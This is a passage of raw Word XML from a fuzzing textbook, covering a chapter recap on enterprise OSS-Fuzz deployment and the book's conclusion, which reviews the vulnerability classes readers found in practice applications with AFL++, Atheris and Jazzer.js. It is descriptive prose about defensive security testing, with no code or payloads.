        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technology evolution adaptation enables fuzzing programs to incorporate new languages, frameworks, and architectural patterns without requiring complete reconfiguration. Extension mechanisms accommodate new technology adoption while maintaining existing coverage. Migration strategies enable smooth transitions during infrastructure upgrades and platform changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evolution planning anticipates organizational changes and technology trends that affect fuzzing program requirements and effectiveness. Growth planning accommodates increased scale and complexity. Technology roadmap alignment ensures fuzzing capabilities evolve with organizational technology adoption. Regulatory adaptation addresses changing compliance and security requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance optimization ensures resource utilization efficiency improves over time rather than degrading due to organizational growth and complexity accumulation. Regular performance review identifies optimization opportunities and resource reallocation strategies. Efficiency measurement tracks testing effectiveness per resource unit over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Program advocacy ensures continued organizational support and resource allocation for fuzzing initiatives. Success story documentation provides evidence for program value and expansion decisions. ROI demonstration supports budget allocation and resource investment. Executive communication maintains visibility and support for long-term program sustainability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Legacy system integration enables fuzzing program expansion to older applications and infrastructure that may require different approaches or technologies. Compatibility strategies accommodate diverse technology stacks and deployment patterns. Migration assistance helps teams adapt legacy applications for modern fuzzing techniques and automation integration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="197"/>
    <w:bookmarkStart w:id="198" w:name="X01901f667b621f61d21b75b21a09645ae982b05"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter Recap: Scaling Reliability Testing to Enterprise Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter equipped you with the strategic frameworks and practical implementation patterns needed to deploy OSS-Fuzz as your primary automation platform for organizational reliability testing. You learned to assess service criticality and resource allocation, configure private OSS-Fuzz deployments for enterprise requirements, and coordinate hybrid automation that provides both immediate CI feedback and comprehensive background coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We covered enterprise resource management patterns that coordinate fuzzing across hundreds of repositories and diverse teams while maintaining cost efficiency and operational sustainability. The chapter demonstrated cross-service coordination for distributed system reliability testing and provided adoption strategies that accommodate different organizational cultures and development practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You gained measurement frameworks that demonstrate business value and support continued investment in reliability testing programs. The sustainable operations patterns ensure your fuzzing infrastructure evolves with organizational growth while maintaining effectiveness and minimizing maintenance overhead.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="198"/>
    <w:bookmarkStart w:id="199" w:name="X810b9423acde4c43af222702ca4930562067cab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Next Steps: Deploying Enterprise-Scale Reliability Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Begin by identifying 3-5 critical services that would benefit most from automated reliability testing and have clear business impact from improved reliability. Deploy a private OSS-Fuzz instance targeting these services using the configuration patterns from this chapter. Focus on demonstrating value through actual reliability improvement rather than just increased testing activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish hybrid automation that provides immediate feedback for development workflows while building comprehensive background coverage through OSS-Fuzz campaigns. Measure effectiveness through incident reduction and recovery time improvement rather than just crash discovery counts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scale gradually by applying successful patterns to additional services and teams while building the operational capabilities needed for long-term program sustainability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="199"/>
    <w:bookmarkStart w:id="200" w:name="Xa29a2ab193f14d87fc71802d7745d1bae63636b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transition to Comprehensive Reliability Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your enterprise-scale automation foundation prepares you for the final component of organizational reliability testing: transforming automated discoveries into systematic reliability improvement through effective program management and team coordination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 9 will show you how to operationalize the massive volume of reliability data your automated systems generate. You’ll learn to build triage systems that convert crash discoveries into actionable developer tasks, measurement frameworks that demonstrate business value, and organizational processes that ensure reliability testing enhances rather than impedes development effectiveness across your entire technology organization.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:pp: ++</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkEnd w:id="201"/>
    <w:bookmarkStart w:id="225" w:name="Xc9d715941a24543c7e14eeed069ce259f40e7af"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Your transformation from manual tester to systematic vulnerability discoverer is complete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You built your first libFuzzer harness eight chapters ago and discovered a heap buffer overflow in email validation code within thirty minutes. That crash—​AddressSanitizer catching memory corruption that manual testing never found—​marked the beginning of your systematic approach to finding bugs before they reach production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Today, you’ve crashed production-grade applications through systematic fuzzing campaigns that found dozens of real vulnerabilities. The image converter’s EXIF parser crashed from malformed headers that AFL++ generated. The release server’s Jinja2 processing failed when Atheris fed it template injection payloads. The chat application’s authentication bypassed room permissions when Jazzer.js systematically tested edge cases in user validation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each application taught you more than just tool usage—​you developed the analytical thinking that separates effective vulnerability discovery from just running fuzzing tools. You understand when coverage-guided mutation finds bugs that random testing misses, how to optimize harnesses for maximum crash discovery, and how to debug complex failure scenarios through systematic input minimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable applications served their purpose: giving you controlled environments to learn fuzzing techniques on realistic codebases without risking production systems. Now you’re ready to apply these same approaches to your own applications.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="206" w:name="Xbc657cdd6ac665aad69e20ec132c597382a0ebf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What You Accomplished: The Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="202" w:name="Xf303a7dbe8bb12fdb61e1005e47872f5e8893e0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory Corruption Discovery Across Languages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your AFL++ campaigns against the image metadata parser discovered three classes of memory corruption bugs that represent real vulnerability patterns in production image processing libraries. The buffer overflow in EXIF header parsing, integer overflow in dimension calculations, and use-after-free in error cleanup code mirror vulnerabilities found in ImageMagick, libjpeg, and other widely-deployed image processing components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You didn’t just find crashes—​you learned to analyze them systematically. Input minimization reduced 50KB crashing files to 200-byte minimal reproducers that pinpoint exact failure conditions. AddressSanitizer output taught you to distinguish heap overflows from stack corruption, helping you understand exploit potential and fix priority.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic mutation strategies you mastered go beyond random bit flipping. Dictionary-guided fuzzing used domain-specific keywords to navigate complex input validation. Structured fuzzing maintained file format validity while exploring edge cases that break parsing assumptions. These techniques consistently find bugs that pure random testing misses.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="202"/>
    <w:bookmarkStart w:id="203" w:name="X6c5ad422d1660be2853fc3a8f8db5a40eb1f44d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python Service Reliability Through Systematic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Atheris campaigns against the FastAPI release server revealed how Python applications fail in ways that compiled languages don’t. Template injection in Jinja2 configuration processing, encoding errors in file upload handling, and SQL injection through template construction represent Python-specific vulnerability classes that traditional security scanners miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You learned to target Python’s unique attack surfaces: pickle deserialization in session handling, Unicode processing in text validation, and dynamic code execution in template rendering. These failure modes cause production outages in Python web services but require systematic fuzzing to discover during development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The performance optimization techniques you applied—​persistent harnesses that avoid process startup overhead, corpus management that guides exploration toward interesting code paths, and structured input generation that maintains protocol validity—​enabled thorough testing of complex Python applications within practical time constraints.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="203"/>
    <w:bookmarkStart w:id="204" w:name="X0cfcf24217b8bffa4a8fefb1716490c09c88041"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JavaScript Client-Side Security in Real-Time Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your Jazzer.js testing of the chat application discovered authentication bypasses, message injection vulnerabilities, and template processing flaws that manual testing rarely finds. Real-time applications like chat systems have unique security challenges: maintaining state across WebSocket connections, validating user permissions for room access, and processing user-generated content safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You systematically tested the application’s security boundaries: authentication functions that validate user sessions, authorization logic that controls room access, message processing pipelines that handle user input, and template rendering systems that generate notifications. Each component yielded vulnerabilities when subjected to systematic fuzzing that manual review missed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The client-side focus distinguished your approach from traditional web application security testing. Instead of treating JavaScript as just another web technology, you targeted JavaScript-specific failure modes: prototype pollution in object processing, XSS in DOM manipulation, and logic errors in asynchronous event handling.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="204"/>
    <w:bookmarkStart w:id="205" w:name="X67d2094273e29e49025f890aa76f865c14bfe1d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-Language Integration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your work with the image converter demonstrated how vulnerabilities propagate across language boundaries when Python applications call native C libraries through FFI interfaces. The crashes you discovered in ImageMagick’s C code became Python interpreter crashes that could bring down web applications processing user uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This cross-language testing revealed how memory corruption in native libraries affects calling applications written in memory-safe languages. Double-free conditions in C libraries cause Python processes to crash. Buffer overflows in image processing affect Django applications that seemed isolated from memory corruption vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You learned to test not just individual components but the integration points where different programming languages interact. These boundaries often contain security assumptions that don’t hold when systematically tested with malformed inputs.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="205"/>
    <w:bookmarkEnd w:id="206"/>
    <w:bookmarkStart w:id="210" w:name="Xfccfe0f5359573dcbdbd07eda333a4e354c3ae4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Systematic Approach You Developed</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="207" w:name="Xa2b944a513ca91f21f5a82892060278f3304aec"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool Selection Based on Attack Surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Through hands-on experience with multiple applications, you developed intuition for choosing the right fuzzing approach for each security challenge. AFL++ excels for file processing applications where you can control input format and structure. libFuzzer provides high-throughput testing for library functions and API endpoints. Atheris targets Python-specific failure modes in web applications. Jazzer.js finds client-side vulnerabilities in JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This tool selection expertise goes beyond reading documentation—​you understand from experience how different approaches perform against real applications. You know when coverage-guided mutation finds bugs that random testing misses, when structured input generation outperforms bit-level mutation, and when cross-language testing reveals vulnerabilities that single-language approaches miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your testing campaigns consistently found vulnerabilities because you matched fuzzing techniques to application characteristics rather than applying generic approaches that miss domain-specific failure modes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:bookmarkStart w:id="208" w:name="X2545b3c244a6680e744f9dd2f2fac3eef8c1eb1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Harness Development That Finds Real Bugs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The harnesses you built go beyond basic "read input, call function" patterns to target the exact code paths where vulnerabilities hide. Your image parser harness focused on metadata processing logic where buffer overflows occur. Your release server harness targeted template processing pipelines where injection vulnerabilities emerge. Your chat application harness tested authentication and authorization logic where access control failures happen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This targeted approach finds bugs that actually matter for application security rather than theoretical vulnerabilities in unused code paths. You learned to identify the security-critical components in complex applications and design fuzzing campaigns that systematically test these high-risk areas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your harness optimization techniques—​persistent mode for performance, structured input generation for coverage, and sanitizer integration for bug detection—​enabled thorough testing that consistently discovers subtle vulnerabilities requiring extensive exploration to trigger.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:id="209" w:name="X51518a9cdad15ddc07ad549f8f62b5af814fefe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Debugging Complex Crashes Into Actionable Fixes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The crash analysis skills you developed transform fuzzing discoveries into fixes that improve application security. Input minimization reduces complex crashing inputs to minimal test cases that pinpoint exact failure conditions. Sanitizer output interpretation distinguishes memory corruption types and severity levels. Stack trace analysis identifies vulnerable code locations and suggests fix strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You learned to verify fixes systematically rather than hoping patches resolve underlying issues. Regression testing with previous crash inputs ensures fixes don’t introduce new vulnerabilities. Coverage analysis confirms that fixes address root causes rather than just symptoms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This systematic debugging approach prevents the common pattern where fuzzing finds crashes but teams struggle to understand their security implications or develop effective fixes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="209"/>
    <w:bookmarkEnd w:id="210"/>
    <w:bookmarkStart w:id="214" w:name="Xcd726003bf9cd7bb7e038a432bea5619adcd42b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applying These Skills to Your Applications</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="211" w:name="X87af6927aeb0d1f2e58441d64d5b26dd20a75d8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Testing That Integrates With Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The integration patterns you learned enable systematic security testing without disrupting development workflows. Docker environments provide consistent fuzzing setups across team members. CI/CD integration catches vulnerabilities before deployment. Automated crash analysis reduces manual triage overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You understand how to package fuzzing capabilities into development tools that teams actually use rather than security testing that requires specialized expertise and remains isolated from regular development practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your experience with multiple application types—​native C applications, Python web services, JavaScript client applications—​provides patterns for securing diverse technology stacks through systematic testing approaches.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="211"/>
    <w:bookmarkStart w:id="212" w:name="X9113b3d66b5f0b4d1ce9a19179bdec0759e0fe4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Discovery in Production Contexts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The applications you tested represent realistic production complexity: the image converter mirrors file processing services that handle user uploads, the release server resembles CI/CD systems that process deployment artifacts, the chat application reflects real-time communication platforms with complex user interaction patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your vulnerability discoveries in these applications translate directly to production security improvements. The buffer overflows you found in image processing affect any application that handles untrusted image files. The template injection vulnerabilities you discovered impact any Python service that processes user-controlled template data. The authentication bypasses you identified threaten any application with complex permission models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You know how to prioritize vulnerability discovery based on actual attack surface and business impact rather than theoretical security checklists that don’t reflect how applications actually fail.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="212"/>
    <w:bookmarkStart w:id="213" w:name="X3b703da926b3fde51846dd3b156bdfec5d5b5b3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building Security Culture Through Measurable Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach you developed provides concrete evidence of security improvements rather than abstract promises about reduced risk. Vulnerability counts before and after fuzzing implementation demonstrate testing effectiveness. Crash discovery rates show improvement in bug detection capabilities. Fix verification proves that security issues get resolved rather than just identified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This measurement enables you to build security programs that demonstrate value to engineering teams and business stakeholders through concrete results rather than theoretical security improvements.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="213"/>
    <w:bookmarkEnd w:id="214"/>
    <w:bookmarkStart w:id="218" w:name="X733df81f2726fe7554c1367b13c9f68ae180f42"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Mindset Transformation</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="215" w:name="Xb889579fcf37c62a311cec8c289cf3040fb8e7e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From Hope-Based to Evidence-Based Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your transformation goes beyond learning tools—​you developed a systematic mindset that approaches security through evidence rather than assumptions. Instead of hoping input validation works correctly, you systematically test edge cases that reveal validation failures. Instead of assuming authentication logic is secure, you systematically explore permission boundaries that reveal authorization bypasses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This evidence-based approach extends beyond fuzzing to all aspects of application security. You now evaluate security controls based on their testing coverage rather than their design intentions. You prioritize security investments based on actual vulnerability discovery rather than theoretical risk assessments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:bookmarkStart w:id="216" w:name="Xc6f4f7030ba8ca6b80a394250c94ab5d4ceba6e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding Real vs. Theoretical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your hands-on experience with multiple applications taught you to distinguish vulnerabilities that pose actual security risks from theoretical issues that don’t affect production security. The crashes you found in image processing represent real denial-of-service vulnerabilities. The template injection you discovered enables actual code execution attacks. The authentication bypasses you identified allow real unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This practical understanding enables you to focus security efforts on issues that actually threaten application security rather than getting distracted by academic vulnerabilities that don’t translate to real attack scenarios.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="216"/>
    <w:bookmarkStart w:id="217" w:name="X788f0bbd1698aa15d9d70acda240f1408a458bf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systematic Problem-Solving Skills</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The debugging and analysis techniques you developed apply broadly to complex technical problems beyond security testing. Input minimization teaches systematic isolation of root causes. Coverage analysis reveals which code paths actually execute during testing. Performance optimization shows how to scale testing approaches to realistic problem sizes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These analytical skills enhance your general software engineering capabilities while providing specialized expertise in vulnerability discovery and security testing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="217"/>
    <w:bookmarkEnd w:id="218"/>
    <w:bookmarkStart w:id="222" w:name="X4a3737a6d17995ba3c2d49f515423a13e69492f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next Steps: Scaling Your Impact</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="219" w:name="Xe8c8fcd1e55dfd18af419b345dfb6a53cc175d1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Individual Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply your fuzzing skills immediately to applications you’re currently developing or maintaining. Start with high-risk components that process external input: file upload handlers, API endpoints that parse complex data, authentication systems that validate user credentials, template processing engines that render user content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the harness patterns you learned to build targeted testing for your specific application components. Adapt the optimization techniques to your performance requirements and infrastructure constraints. Integrate crash analysis into your debugging workflows to transform vulnerability discoveries into security improvements.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="219"/>
    <w:bookmarkStart w:id="220" w:name="Xde9217e91e56bba49c6cbb7eeef8877b3e81e45"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team and Organizational Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Share your fuzzing expertise through training sessions that demonstrate concrete vulnerability discovery rather than abstract security concepts. Build fuzzing infrastructure that enables team members to benefit from systematic security testing without requiring deep fuzzing expertise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document the vulnerability discovery and fix patterns you developed to create organizational knowledge that persists beyond individual expertise. Establish metrics and reporting that demonstrate security improvements through systematic testing approaches.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="220"/>
    <w:bookmarkStart w:id="221" w:name="X71048fb95de264e5c03c734a9332fd6273bd6bb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Community Contribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider contributing to open source fuzzing tools based on your hands-on experience with their strengths and limitations. Participate in security research communities by sharing novel applications of fuzzing techniques to new problem domains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your combination of practical experience with multiple fuzzing tools and diverse application types provides valuable perspective for advancing the state of automated vulnerability discovery.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="221"/>
    <w:bookmarkEnd w:id="222"/>
